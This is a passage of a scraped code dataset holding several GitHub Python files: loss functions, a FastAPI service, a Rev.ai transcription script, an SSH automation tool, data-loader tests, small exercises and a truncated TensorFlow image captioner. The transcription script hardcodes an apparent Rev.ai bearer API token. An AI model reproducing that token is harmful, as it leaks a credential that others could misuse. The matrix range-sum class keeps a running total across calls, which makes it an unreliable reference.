do_report_metric, report the dice score instead of the dice loss (1 - dice score).\n \"\"\"\n super().__init__()\n\n if not do_report_metric and threshold is not None:\n raise ValueError('Dice metric should not use thresholding when used as a loss.')\n\n self.threshold = threshold\n self.reduction = reduction\n self.do_report_metric = do_report_metric\n\n def forward(self, logits: torch.Tensor, target: torch.Tensor) -> torch.Tensor:\n probabilities = torch.sigmoid(logits)\n if self.do_report_metric:\n return dice_coeff(probabilities, target, self.threshold, self.reduction)\n\n return 1.0 - dice_coeff(probabilities, target, self.threshold, self.reduction)\n\n\nclass BCEWithDiceLoss(torch.nn.Module):\n \"\"\"Weighted sum of Dice loss with binary cross-entropy.\"\"\"\n def __init__(self, reduction: str, bce_weight: float = 1.0):\n super().__init__()\n self.dice = DiceLoss(None, reduction, False)\n self.bce = torch.nn.BCEWithLogitsLoss(reduction=reduction)\n self.bce_weight = bce_weight\n\n def forward(self, logits: torch.Tensor, target: torch.Tensor) -> torch.Tensor:\n return self.bce_weight * self.bce(logits, target) + self.dice(logits, target)\n","repo_name":"menzelab/implicit-shape-reconstruction","sub_path":"impl_recon/utils/nn_utils.py","file_name":"nn_utils.py","file_ext":"py","file_size_in_byte":2813,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"54"} +{"seq_id":"5158713921","text":"from fastapi import HTTPException, UploadFile, status\nfrom image_service.interfaces.service import ImageServiceInterface\nfrom users.models import User\nfrom .interfaces.repositories_interface import RepositoriesInterface\nfrom typing import Optional\nfrom configs import IMAGES_DIR\nfrom .schemas import CreateOrUpdateProductSchema, QueryPriceSchema, QueryProductSchema\n\n\nclass ProductServices:\n def __init__(self, repository: RepositoriesInterface):\n self._repository = repository\n\n async def get_all_products(self, limit: Optional[int], offset: Optional[int],\n query_data: QueryProductSchema, price_query: QueryPriceSchema):\n return await self._repository.get_all_products(limit=limit, offset=offset,\n query_data=query_data.dict(exclude_none=True), price_query_data=price_query.dict(exclude_none=True))\n\n async def get_detail_product(self, product_id: int):\n return await self._repository.get_detail_product(product_id=product_id)\n\n async def delete_product(self, product_id: int, user: User, image_service: ImageServiceInterface):\n await self._repository.delete_product(product_id=product_id, user=user, image_service=image_service)\n\n async def create_product(self, data: CreateOrUpdateProductSchema,\n images: Optional[list[UploadFile]], user: User, image_service: ImageServiceInterface, host: str):\n created_data = data.dict(exclude_none=True)\n return await self._repository.create_product(product_data=created_data, user=user, images=images, image_service=image_service, host=host)\n\n async def update_product(self, product_id: int, data: CreateOrUpdateProductSchema, user: User,\n images: Optional[list[UploadFile]], image_service: ImageServiceInterface, host: str):\n updated_data = data.dict(exclude_none=True)\n result, product = await self._repository.update_product(product_id=product_id, user=user, updated_data=updated_data,\n images=images, image_service=image_service, host=host)\n if not result:\n raise HTTPException(status_code=status.HTTP_400_BAD_REQUEST,\n detail='You cannot update this listing')\n return product\n\n async def get_favorites_product(self, limit: Optional[int], offset: Optional[int], user: User):\n return await self._repository.get_favorite_products(offset=offset, limit=limit, user=user)\n\n async def add_product_to_favorites(self, product_id: int, user: User):\n return await self._repository.add_product_to_favorites(product_id=product_id, user=user)\n\n async def remove_product_from_favorites(self, favorite_id: int, user: User):\n return await self._repository.remove_product_from_favorites(favorite_id=favorite_id, user=user)\n","repo_name":"sb-elliot-7s/ecommerce-app-fastapi","sub_path":"products/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":2914,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"54"} +{"seq_id":"39374392194","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Sep 15 16:19:53 2018\r\n\r\n@author: wilson\r\n\"\"\"\r\n\r\nimport requests\r\nimport json\r\nimport time\r\n# Imports the Google Cloud client library\r\nfrom google.cloud import language\r\nfrom google.cloud.language import enums\r\nfrom google.cloud.language import types\r\n\r\ndef get_entities(text):\r\n \"\"\"Detects entities in the text.\"\"\"\r\n client = language.LanguageServiceClient()\r\n\r\n # if isinstance(text, six.binary_type):\r\n # text = text.decode('utf-8')\r\n\r\n # Instantiates a plain text document.\r\n document = types.Document(\r\n content=text,\r\n type=enums.Document.Type.PLAIN_TEXT)\r\n\r\n # Detects entities in the document. You can also analyze HTML with:\r\n # document.type == enums.Document.Type.HTML\r\n entities = client.analyze_entities(document).entities\r\n\r\n # entity types from enums.Entity.Type\r\n # entity_type = ('UNKNOWN', 'PERSON', 'LOCATION', 'ORGANIZATION',\r\n # 'EVENT', 'WORK_OF_ART', 'CONSUMER_GOOD', 'OTHER')\r\n\r\n entityList = []\r\n for entity in entities:\r\n if entity.name not in entityList:\r\n entityList.append(entity.name)\r\n \r\n return entityList\r\n\r\nAPI_KEY = \"Bearer 01MupYze44lFlPrwIkG5iyTfI_jGDPYvee_gxfvmi6n_LMU5WHq99oT0urmtXZQUO9pJOcD0XT3SI8nHXEYFMkcm_5vgk\"\r\nHEADERS = {'Authorization': API_KEY}\r\n\r\ndef submit_job_url(media_url):\r\n url = \"https://api.rev.ai/revspeech/v1beta/jobs\"\r\n payload = {'media_url': media_url,\r\n 'metadata': \"Hack MIT Team LERL\"}\r\n request = requests.post(url, headers=HEADERS, json=payload)\r\n\r\n if request.status_code != 200:\r\n raise\r\n\r\n response_body = request.json()\r\n return response_body['id']\r\n\r\ndef view_job(id):\r\n url = f'https://api.rev.ai/revspeech/v1beta/jobs/{id}'\r\n request = requests.get(url, headers=HEADERS)\r\n\r\n if request.status_code != 200:\r\n raise\r\n\r\n response_body = request.json()\r\n return response_body\r\n\r\ndef get_transcript(id):\r\n url = f'https://api.rev.ai/revspeech/v1beta/jobs/{id}/transcript'\r\n headers = HEADERS.copy()\r\n headers['Accept'] = 'application/vnd.rev.transcript.v1.0+json'\r\n request = requests.get(url, headers=headers)\r\n\r\n if request.status_code != 200:\r\n raise\r\n\r\n response_body = request.json()\r\n return response_body\r\n\r\ndef get_text_body(id):\r\n transcript = get_transcript(id)\r\n textBody = ''\r\n for monologue in transcript.values():\r\n for item in monologue:\r\n for nextItem in item['elements']:\r\n textBody = textBody + nextItem['value']\r\n print(len(textBody.split()))\r\n return textBody\r\n\r\ndef test_workflow_with_url(url):\r\n print (\"Submitting job with URL\")\r\n id = submit_job_url(url)\r\n print (\"Job created\")\r\n print ('ID: ' + id )\r\n view_job(id)\r\n \r\n while True:\r\n job = view_job(id)\r\n status = job[\"status\"]\r\n print (f'Checking job transcription status: { status }')\r\n if status == \"transcribed\":\r\n break\r\n if status == \"failed\":\r\n raise\r\n\r\n print (\"Trying in another 10 seconds\")\r\n time.sleep(10)\r\n\r\n return get_transcript(id)\r\n\r\ndef main():\r\n # Testing with URL\r\n media_url = \"http://www.obamadownloads.com/mp3s/yes-we-can-speech.mp3\"\r\n # get_entities(test_workflow_with_url(media_url))\r\n print(get_entities(get_text_body(216064345)))\r\n\r\n\r\n \r\n \r\n\r\nif __name__ == \"__main__\":\r\n main()","repo_name":"esatterfield32/hackMIT2018","sub_path":"hackmitMicroserver.py","file_name":"hackmitMicroserver.py","file_ext":"py","file_size_in_byte":3446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"37772787781","text":"# import __main__ as main\n# from Helper.TimerLogger import CodeTimeLogging\n# fileName = main.__file__\n# fileName = fileName.split('\\\\')[-1]\n\n# CodeTimeLogging(Flag='F', filename=fileName, Tag='Matrix', Difficult='Medium')\n\n\nclass numMatrix:\n def __init__(self, mat):\n self.mat = mat\n self.rowLen = len(mat)\n self.colLen = len(mat[0])\n self.ans = 0\n\n def sumRange(self, p1, p2):\n x1, y1 = p1\n x2, y2 = p2\n\n for r in range(x1, x2 + 1):\n for c in range(y1, y2 + 1):\n self.ans += self.mat[r][c]\n\n return self.ans\n\n\nmat = [[3, 0, 1, 4, 2],\n [5, 6, 3, 2, 1],\n [1, 2, 0, 1, 5],\n [4, 1, 0, 1, 7],\n [1, 0, 3, 0, 5]]\n\np1 = (2, 1)\np2 = (4, 3)\n\np1 = (1, 1)\np2 = (2, 2)\nn = numMatrix(mat)\nprint(n.sumRange(p1, p2))\n","repo_name":"Omkar02/FAANG","sub_path":"G_LC_304_RangeSumQuery2DImmutable.py","file_name":"G_LC_304_RangeSumQuery2DImmutable.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"38191714863","text":"import paramiko\r\nimport sys\r\nimport time\r\nimport os\r\nimport socket\r\nfrom pygments import highlight, lexers, formatters\r\nimport re\r\nimport json\r\nimport argparse\r\n\r\n\r\n# pip install pygments\r\n# pip install paramiko\r\n\r\n\r\nclass bcolors:\r\n HEADER = '\\033[95m'\r\n OKBLUE = '\\033[94m'\r\n OKGREEN = '\\033[92m'\r\n WARNING = '\\033[93m'\r\n FAIL = '\\033[91m'\r\n ENDC = '\\033[0m'\r\n BOLD = '\\033[1m'\r\n UNDERLINE = '\\033[4m'\r\n GRAY = \"\\033[1;30;40m\"\r\n\r\n\r\nparser = argparse.ArgumentParser(description='')\r\nparser.add_argument('-f', '--file', type=str, required=False, metavar='', help='provide the hosts file')\r\nresults = parser.parse_args()\r\nhosts_file = results.file\r\nif hosts_file is None:\r\n print(\"[ Error ] \" + bcolors.FAIL + \"--file option must be specified\" + bcolors.ENDC)\r\n print('')\r\n parser.print_help(sys.stderr)\r\n exit(1)\r\nif not os.path.isfile(hosts_file):\r\n print(\"[ Error ] \" + bcolors.FAIL + \"({}) is NOT a File\".format(hosts_file) + bcolors.ENDC)\r\n print('')\r\n parser.print_help(sys.stderr)\r\n exit(1)\r\n\r\n\r\ndef hosts(file=hosts_file):\r\n hosts_file_ = open(file, 'r')\r\n h1 = hosts_file_.read().split(\"\\n\")\r\n info = {}\r\n info['hosts'] = [string for string in h1 if string != '']\r\n info['hosts_number'] = len(info['hosts'])\r\n return info\r\n\r\n\r\ndef get_stderr(string, search='\\^'):\r\n \"\"\"\r\n function to search for keywords inside of text and to get several lines of the matched keywords\r\n so that it can be represented as STDERR\r\n :param string: string text to search for an error keyword\r\n :param search: Regex search in the text provided in \"String\" Parameter'\r\n :return: dict consists of 2 keys {list: list of matched lines (can contain empty lines), string: matched lines as a string}\r\n \"\"\"\r\n n = 0\r\n string_list_with_number = {}\r\n found_with_number = {}\r\n string_list = string.split(\"\\n\") # split the text into lines separated by \"new line\"\r\n for line in string_list: # create a dict \"string_list_with_number\" which consists of line number & text of each line\r\n n += 1\r\n string_list_with_number[n] = line\r\n found = re.findall(\"{}.*$\".format(search), line) # searches the keyword inside the lines\r\n found_with_number[\r\n n] = found # dict \"found_with_number\" consists of line number & matched lines; lines that does\r\n # not match the search will be empty arr like: {1: [], 2: [], 3: ['% bla bla], 4: []}\r\n\r\n err_lines = []\r\n for key, value in found_with_number.items(): # iterate over matched lines in the dict \"found_with_number\"\r\n if value:\r\n err_lines.append(key) # save the line number of the matched lines in \"err_lines\" list\r\n\r\n result = []\r\n lines_to_print = []\r\n for num in err_lines:\r\n num -= 1 # get a previous line (to get the command line)\r\n for i in range(6): # get 6 lines after the error detected line\r\n lines_to_print.append(\r\n num + i) # append the result to \"lines_to_print\" dict (which contains needed line numbers)\r\n try:\r\n for i in list(set(lines_to_print)): # list(set(lines_to_print)) --> to get rid of duplicates\r\n result.append(string_list_with_number[i]) # save the matched lines (strings) to \"result\" list\r\n\r\n except KeyError:\r\n return\r\n finally:\r\n dict = {'list': result, 'string': '\\n'.join(result)}\r\n return dict\r\n\r\n\r\nclass SSH_Connect:\r\n \"\"\"\r\n Class to Connect & execute commands to hosts/devices via ssh\r\n \"\"\"\r\n\r\n def __init__(self, host, user, password, port=22, ssh_timeout=10, allow_agent=False):\r\n self.info = {}\r\n self.hosts = None\r\n self.host = host\r\n self.user = user\r\n self.password = password\r\n self.port = port\r\n self.ssh_timeout = ssh_timeout\r\n self.is_connected = False\r\n self.channel = None\r\n\r\n print(\"[ INFO ] \" + bcolors.WARNING + \"Trying to connect to (%s)\" % self.host + bcolors.ENDC)\r\n i = 1\r\n while True:\r\n try:\r\n self.ssh = paramiko.SSHClient()\r\n self.ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\r\n self.ssh.connect(self.host, self.port, self.user, self.password, timeout=self.ssh_timeout,\r\n allow_agent=allow_agent, look_for_keys=False)\r\n self.is_connected = True\r\n connected_msg = (\"[ INFO ] \" + bcolors.OKGREEN + \"Connected to (%s)\" % self.host + bcolors.ENDC)\r\n print(connected_msg)\r\n\r\n self.channel = self.ssh.invoke_shell()\r\n output = self.channel.recv(9999)\r\n self.channel.send_ready()\r\n time.sleep(1)\r\n break\r\n except paramiko.AuthenticationException as e:\r\n print(\r\n \"[ ERROR ] \" + bcolors.FAIL + \"Authentication failed when connecting to %s\" % self.host + bcolors.ENDC)\r\n print(\"\\t --> \" + str(e))\r\n print(\"\\t --> (%s) \" % self.host + bcolors.FAIL + \"Skipped\" + bcolors.ENDC)\r\n print(\"\")\r\n break\r\n except socket.gaierror as e:\r\n print(\r\n \"[ ERROR ] \" + bcolors.FAIL + \"Could not resolve hostname (%s) Name or service not known\" % self.host + bcolors.ENDC)\r\n print(\"\\t --> \" + str(e))\r\n print(\"\\t --> (%s) \" % self.host + bcolors.FAIL + \"Skipped\" + bcolors.ENDC)\r\n print(\"\")\r\n break\r\n except (paramiko.ssh_exception.NoValidConnectionsError, paramiko.SSHException, socket.error) as e:\r\n print(\r\n \"[ ERROR ] \" + bcolors.FAIL + \"Not able to establish ssh connection with %s\" % self.host + bcolors.ENDC + \" , Trying again...\")\r\n print(\"\\t --> \" + str(e))\r\n i += 1\r\n time.sleep(1)\r\n if i == 5:\r\n print(\"[ ERROR ] \" + bcolors.FAIL + \"Could not connect to %s. Giving up\" % self.host + bcolors.ENDC)\r\n print(\"\\t --> (%s) \" % self.host + bcolors.FAIL + \"Skipped\" + bcolors.ENDC)\r\n print(\"\")\r\n break\r\n\r\n def print(self, msg, level='info', force=False):\r\n \"\"\"\r\n Method to Print with different print Levels ('info', 'warn', 'fail')\r\n :param force: by default it NOT print if the failed to connect to the host, use this option to print anyway\r\n :param level: info (green color), warn(yellow color), fail(red color)\r\n :param msg: The message to be printed\r\n :return:\r\n \"\"\"\r\n color = None\r\n start = None\r\n if level == 'info':\r\n color = bcolors.OKGREEN\r\n start = bcolors.GRAY + \"-- INFO --\" + bcolors.ENDC\r\n elif level == 'warn':\r\n color = bcolors.WARNING\r\n start = bcolors.GRAY + \"-- WARNING --\" + bcolors.ENDC\r\n elif level == 'fail':\r\n color = bcolors.FAIL\r\n start = bcolors.GRAY + \"[FAIL]\" + bcolors.ENDC\r\n else:\r\n print(\r\n bcolors.FAIL + \" Supported print level options are: ['info', 'warn', 'fail'] - Your input: ({})\".format(\r\n level) + bcolors.ENDC)\r\n exit(1)\r\n if not force:\r\n if self.is_connected:\r\n print(start + color + ' ' + msg + bcolors.ENDC)\r\n else:\r\n print(start + color + ' ' + msg + bcolors.ENDC)\r\n\r\n def exec_cmd(self, cmd):\r\n \"\"\"\r\n Run a command on a remote host via ssh (Suitable for Servers)\r\n :param cmd: Command to run on a remote host\r\n :return: dict\r\n \"\"\"\r\n if self.is_connected:\r\n stdin, stdout, stderr = self.ssh.exec_command(cmd)\r\n self.info['connected'] = self.is_connected\r\n self.info['cmd'] = cmd\r\n self.info['stdout'] = stdout.read().decode(\"utf-8\")\r\n self.info['stderr'] = stderr.read().decode(\"utf-8\")\r\n self.info['exit_code'] = stdout.channel.recv_exit_status()\r\n return self.info\r\n elif not self.is_connected:\r\n self.info['cmd'] = cmd\r\n self.info['connected'] = self.is_connected\r\n self.info['stdout'] = ''\r\n self.info['stderr'] = (\"Failed to connect to %s\" % self.host)\r\n self.info['exit_code'] = ''\r\n return self.info\r\n\r\n def shell(self, cmd=None, cmd_from_file=None, print_stdout=False, stderr_search_keyword='\\^', exit_on_fail=True,\r\n print_json=False, search=None):\r\n \"\"\"\r\n Method to execute shell commands through SSH shell channel, similar to attaching to a shell session\r\n :param cmd_from_file: to run commands from a text file\r\n :param exit_on_fail: fail if STDERR is found\r\n :param stderr_search_keyword: by default it searches for \"^\" to catch stderr on Cisco devices, you can change it as it suits you\r\n :param print_json: Whether to print JSON to output\r\n :param cmd: command to be run, make sure the the command ends with a new line, i.e \"sh vlan br\\n\"\r\n :param print_stdout: to print cmd stdout in terminal with (Blue color)\r\n :param search: Option to Search the command stdout with Regexp\r\n :return: dictionary\r\n \"\"\"\r\n\r\n if self.is_connected:\r\n\r\n if (cmd_from_file is not None) and (cmd is not None):\r\n print(\"[ Error ] \" + bcolors.FAIL + \"You can only use 'cmd' or 'cmd_from_file' options\" + bcolors.ENDC)\r\n exit(1)\r\n\r\n if cmd_from_file is not None:\r\n if os.path.exists(cmd_from_file):\r\n f = open(cmd_from_file, 'r')\r\n cmd = f.read()\r\n elif not os.path.isfile(cmd_from_file):\r\n print(\r\n \"[ Error ] \" + bcolors.FAIL + \"You've specified 'cmd_from_file option' but ({}) is NOT a file\".format(\r\n cmd_from_file) + bcolors.ENDC)\r\n exit(1)\r\n\r\n self.channel.send(cmd + '\\n' + '\\n')\r\n time.sleep(2)\r\n self.info['cmd'] = cmd.replace(\"\\r\", '').split(\"\\n\")\r\n cmd_original = self.info['cmd']\r\n self.info['connected'] = self.is_connected\r\n self.info['stdout'] = self.channel.recv(9999).decode(\"utf-8\")\r\n stdout_original = self.info['stdout']\r\n self.info['stderr'] = get_stderr(stdout_original, stderr_search_keyword)['string'].replace(\"\\r\", '').split(\r\n \"\\n\")\r\n self.info['search'] = search\r\n self.info['search_found?'] = None\r\n self.info['search_match'] = None\r\n stderr_ = [x for x in self.info['stderr'] if x]\r\n if len(stderr_) > 0:\r\n self.info['exit_code'] = 1\r\n else:\r\n self.info['stderr'] = []\r\n self.info['exit_code'] = 0\r\n if search:\r\n found = re.findall(search, self.info['stdout'])\r\n if len(found) > 0:\r\n self.info['search_match'] = found\r\n self.info['search_found?'] = True\r\n else:\r\n self.info['search_found?'] = False\r\n\r\n if print_json:\r\n self.info['stdout'] = self.info['stdout'].replace(\"\\r\", '')\r\n self.info['stdout'] = self.info['stdout'].split(\"\\n\")\r\n self.info['cmd'] = [x for x in self.info['cmd'] if x]\r\n formatted_json = json.dumps(self.info, indent=4, sort_keys=True, ensure_ascii=False)\r\n colorful_json = highlight(formatted_json.encode('utf8'), lexers.JsonLexer(),\r\n formatters.TerminalFormatter())\r\n print(colorful_json)\r\n self.info['stdout'] = stdout_original\r\n self.info['cmd'] = cmd_original\r\n else:\r\n self.info['stdout'] = stdout_original\r\n\r\n if print_stdout:\r\n print(bcolors.OKBLUE + stdout_original + bcolors.ENDC)\r\n if exit_on_fail:\r\n if self.info['exit_code'] > 0:\r\n print(\"\")\r\n print(bcolors.FAIL + \"* * * * * * * * * * * * * * * * * * * * * * *\" + bcolors.ENDC)\r\n print(\"[ ERROR ] \" + bcolors.FAIL + \"Found the following Error:\" + bcolors.ENDC)\r\n print('')\r\n err = get_stderr(stdout_original, stderr_search_keyword)['string']\r\n # for c in self.info['cmd']:\r\n # print(bcolors.OKBLUE + c + bcolors.ENDC)\r\n print('')\r\n print(bcolors.FAIL + err + bcolors.ENDC)\r\n print(bcolors.FAIL + \"* * * * * * * * * * * * * * * * * * * * * * *\" + bcolors.ENDC)\r\n print(\"\")\r\n exit(1)\r\n return self.info\r\n\r\n elif not self.is_connected:\r\n self.info['cmd'] = cmd\r\n self.info['connected'] = self.is_connected\r\n self.info['stdout'] = ''\r\n self.info['stderr'] = (\"Failed to connect to %s\" % self.host)\r\n self.info['search_found?'] = None\r\n self.info['search_match'] = None\r\n self.info['exit_code'] = None\r\n return self.info\r\n\r\n def close(self):\r\n \"\"\"\r\n Close the ssh session, ssh session is opened at the initialization of the Class\r\n :return:\r\n \"\"\"\r\n self.ssh.close()\r\n","repo_name":"eslam-gomaa/Flexible_Nework_Automation","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":13572,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"10744835114","text":"import unittest\nimport os\nfrom python.housinginsights.ingestion import LoadData as load_data\nfrom sqlalchemy.exc import ProgrammingError\n\nPYTHON_PATH = load_data.PYTHON_PATH\n\n\nclass MyTestCase(unittest.TestCase):\n def setUp(self):\n # use test data\n test_data_path = os.path.abspath(os.path.join(PYTHON_PATH, 'tests',\n 'test_data'))\n self.meta_path = os.path.abspath(os.path.join(test_data_path,\n 'meta_load_data.json'))\n self.manifest_path = os.path.abspath(\n os.path.join(test_data_path, 'manifest_load_data.csv'))\n self.database_choice = 'docker_database'\n self.loader = load_data.LoadData(database_choice=self.database_choice,\n meta_path=self.meta_path,\n manifest_path=self.manifest_path)\n\n def query_db(self, engine, query):\n \"\"\"\n Helper function that returns the result of querying the database.\n \"\"\"\n try:\n query_result = engine.execute(query)\n return [dict(x) for x in query_result.fetchall()]\n except ProgrammingError as e:\n self.assertEqual(True, False, e)\n\n def test_update_only(self):\n # use the same sql engine for db lookup\n loader_engine = self.loader.engine\n\n # start with empty database\n self.loader._drop_tables()\n result = loader_engine.table_names()\n self.assertEqual(len(result), 0)\n\n # load crime data one at a time without overriding\n # existing data\n crime_data = ['crime_2016', 'crime_2015', 'crime_2017']\n table_name = 'crime'\n\n for idx, data_id in enumerate(crime_data, start=1):\n these_data = [data_id]\n result = self.loader.update_database(unique_data_id_list=these_data)\n self.assertTrue(data_id in result)\n\n # validate database contents\n query = \"SELECT DISTINCT unique_data_id FROM crime\"\n results = self.query_db(loader_engine, query)\n\n self.assertEqual(len(results), idx)\n\n for result in results:\n self.assertTrue(result['unique_data_id'] in crime_data)\n\n # there's only 'crime' and manifest table in database\n result = loader_engine.table_names()\n self.assertEqual(len(result), 2)\n self.assertTrue(table_name in result)\n self.assertTrue('manifest' in result)\n\n # make sure database is not empty\n self.loader.rebuild()\n result = loader_engine.table_names()\n self.assertTrue(len(result) > 0)\n\n # update sample of data_ids and make sure no duplications\n these_data = ['project', 'crime_2017', 'dchousing_subsidy']\n\n # get current table and unique_data_id row counts\n tables = ['project', 'crime', 'subsidy']\n tables_row_counts = []\n data_id_row_counts = []\n\n for idx, table in enumerate(tables):\n # get table counts\n query = \"SELECT COUNT(*) FROM {}\".format(table)\n result = self.query_db(loader_engine, query)\n tables_row_counts.append(result[0]['count'])\n\n # get unique_data_id counts\n query = \"SELECT COUNT(*) FROM {} WHERE unique_data_id = \" \\\n \"'{}'\".format(table, these_data[idx])\n result = self.query_db(loader_engine, query)\n data_id_row_counts.append(result[0]['count'])\n\n processed_data_id = self.loader.update_database(these_data)\n\n for data_id in these_data:\n self.assertTrue(data_id in processed_data_id)\n\n for idx, table in enumerate(tables):\n # get updated table counts\n query = \"SELECT COUNT(*) FROM {}\".format(table)\n result = self.query_db(loader_engine, query)\n self.assertEqual(result[0]['count'], tables_row_counts[idx])\n\n # get updated unique_data_id counts\n query = \"SELECT COUNT(*) FROM {} WHERE unique_data_id = \" \\\n \"'{}'\".format(table, these_data[idx])\n result = self.query_db(loader_engine, query)\n self.assertEqual(result[0]['count'], data_id_row_counts[idx])\n\n def test_create_list(self):\n # Note - you will need to modify folder path to match local env\n folder_path = os.path.join(PYTHON_PATH, os.pardir, 'data', 'raw',\n 'apis', '20170528')\n result = self.loader.create_list(folder_path)\n print(result)\n self.assertEqual(len(result), 13)\n\n def test_rebuild(self):\n result = self.loader.rebuild()\n self.assertTrue(result)\n\n def test_make_manifest(self):\n folder_path = os.path.join(PYTHON_PATH, os.pardir, 'data', 'raw',\n 'apis')\n fields = self.loader.manifest.keys\n print(fields)\n self.assertTrue(fields)\n result_path = self.loader.make_manifest(folder_path)\n self.assertEqual(self.loader.manifest.path, result_path)\n\n # TODO - write test code\n def test__remove_existing_data(self):\n pass\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"ajhalani/housing-insights","sub_path":"python/tests/test_load_data.py","file_name":"test_load_data.py","file_ext":"py","file_size_in_byte":5235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"54"} +{"seq_id":"74580539682","text":"#(i)assigning elements to different lists\n#I didnt understand the question\n#I did contact captain aviral multiple times in multiple platfoms\n#but couldnt find the response i needed\n#I also reminded him in the live(on 3rd july) but in vain\n#anyways, this is what I understood\n#and am finally writing this code because\n#I waited for almost 48 hours and am still waiting for the responce\ndef i():\n l1=list(input(\"enter the elements to be assigned to the 1st list \").split())\n l2=list(input(\"enter the elements to be assigned to the 2nd list \").split())\n print(\"elements of 1st list \",l1)\n print(\"elements of 2nd list \",l2)\n\n#(ii)accessing elements from tuple \ndef ii():\n t=tuple(input(\"enter the elements of the tuple \").split())\n index=int(input(\"enter index of the element to be accessed\"))\n print(\"you have accessed the element \",t[index])\n\n#(iii)deleting different dictionary elements\ndef iii():\n i=0\n dictionary={}\n keys=list(input(\"enter the keys to be entered in the dictionary \").split())\n values=list(input(\"enter the values to be entered in the dictionary \").split())\n if len(keys) != len(values):\n print(\"length of values not equal with lenght of keys \")\n return\n for key in keys:\n dictionary[key]=values[i]\n i+=1\n delete=input(\"enter the key at which the value will be deleted \")\n if delete in keys:\n del dictionary[delete]\n else:\n print(\"invalid key\")\n print(\"the present dictionary is \",dictionary)\n\ndecision=input(\"enter i for assigning elements to different lists\\nii for accessing elements from tuple\\niii for deleting different dictionary elements \")\nif decision == \"i\":\n i()\nelif decision == \"ii\":\n ii()\nelif decision == \"iii\":\n iii()\nelse:\n print(\"invalid option\")\n","repo_name":"akula0611/fuctions","sub_path":"coding functions.py","file_name":"coding functions.py","file_ext":"py","file_size_in_byte":1787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71741647841","text":"import tensorflow as tf\nimport tensorflow.contrib.seq2seq as seq2seq\n\n\nclass ImageCaptioner(tf.keras.layers.Layer):\n\n def __init__(self, image_caption_cell, word_vocabulary, word_embeddings,\n beam_size=3, maximum_iterations=100, name=None, trainable=True, **kwargs ):\n self.image_caption_cell = image_caption_cell\n self.word_vocabulary = word_vocabulary\n self.beam_size = beam_size\n self.maximum_iterations = maximum_iterations\n self.vocab_size = word_embeddings.shape[0]\n self.embedding_size = word_embeddings.shape[1]\n super(ImageCaptioner, self).__init__(name=name, trainable=trainable, **kwargs)\n self.embeddings_map = tf.get_variable(\"embeddings_map\", dtype=tf.float32,\n initializer=tf.constant(word_embeddings, dtype=tf.float32))\n self.logits_layer = tf.layers.Dense(self.vocab_size, name=\"logits_layer\", \n kernel_initializer=tf.contrib.layers.xavier_initializer())\n \n def __call__(self, \n mean_image_features=None, \n mean_object_features=None, \n spatial_image_features=None, \n spatial_object_features=None, \n seq_inputs=None, lengths=None):\n assert(mean_image_features is not None or mean_object_features is not None or\n spatial_image_features is not None or spatial_object_features is not None)\n use_beam_search = (seq_inputs is None or lengths is None)\n if mean_image_features is not None:\n batch_size = tf.shape(mean_image_features)[0]\n elif mean_object_features is not None:\n batch_size = tf.shape(mean_object_features)[0]\n elif spatial_image_features is not None:\n batch_size = tf.shape(spatial_image_features)[0]\n spatial_image_features = collapse_dims(spatial_image_features, [1, 2])\n mean_image_features = tf.reduce_mean(spatial_image_features, [1])\n elif spatial_object_features is not None:\n batch_size = tf.shape(spatial_object_features)[0] \n spatial_object_features = collapse_dims(spatial_object_features, [2, 3])\n mean_object_features =tf.reduce_mean(spatial_object_features, [2])\n initial_state = self.image_caption_cell.zero_state(batch_size, tf.float32)\n if use_beam_search:\n if mean_image_features is not None:\n mean_image_features = seq2seq.tile_batch(mean_image_features, \n multiplier=self.beam_size)\n self.image_caption_cell.mean_image_features = mean_image_features\n if mean_object_features is not None:\n mean_object_features = seq2seq.tile_batch(mean_object_features, \n multiplier=self.beam_size)\n self.image_caption_cell.mean_object_features = mean_object_features\n if spatial_image_features is not None:\n spatial_image_features = seq2seq.tile_batch(spatial_image_features, \n multiplier=self.beam_size)\n self.image_caption_cell.spatial_image_features = spatial_image_features\n if spatial_object_features is not None:\n spatial_object_features = seq2seq.tile_batch(spatial_object_features, \n multiplier=self.beam_size)\n self.image_caption_cell.spatial_object_features = spatial_object_features\n initial_state = seq2seq.tile_batch(initial_state, multiplier=self.beam_size)\n decoder = seq2seq.BeamSearchDecoder(self.image_caption_cell, self.embeddings_map, \n tf.fill([batch_size], self.word_vocabulary.start_id), self.word_vocabulary.end_id, \n initial_state, self.beam_size, output_layer=self.logits_layer)\n outputs, state, lengths = seq2seq.dynamic_decode(decoder, \n maximum_iterations=self.maximum_iterations)\n ids = tf.transpose(outputs.predicted_ids, [0, 2, 1])\n sequence_length = tf.shape(ids)[2]\n flat_ids = tf.reshape(ids, [batch_size * self.beam_size, sequence_length])\n seq_inputs = tf.concat([\n tf.fill([batch_size * self.beam_size, 1], self.word_vocabulary.start_id), flat_ids], 1)\n if mean_image_features is not None:\n self.image_caption_cell.mean_image_features = mean_image_features\n if mean_object_features is not None:\n self.image_caption_cell.mean_object_features = mean_object_features\n if spatial_image_features is not None:\n self.image_caption_cell.spatial_image_features = spatial_image_features\n if spatial_object_features is not None:\n self.image_caption_cell.spatial_object_features = spatial_object_features \n activations, _state = tf.nn.dynamic_rnn(self.image_caption_cell, \n tf.nn.embedding_lookup(self.embeddings_map, seq_inputs),\n sequence_length=tf.reshape(lengths, [-1]), initial_state=initial_state)\n logits = self.logits_layer(activations)\n if use_beam_search:\n length = tf.shape(logits)[1]\n logits = tf.reshape(logits, [batch_size, self.beam_size, length, self.vocab_size])\n return logits, tf.argmax(logits, axis=-1, output_type=tf.int32)\n \n @property\n def trainable_variables(self):\n return (self.image_caption_cell.trainable_variables \n + self.logits_layer.trainable_variables \n + 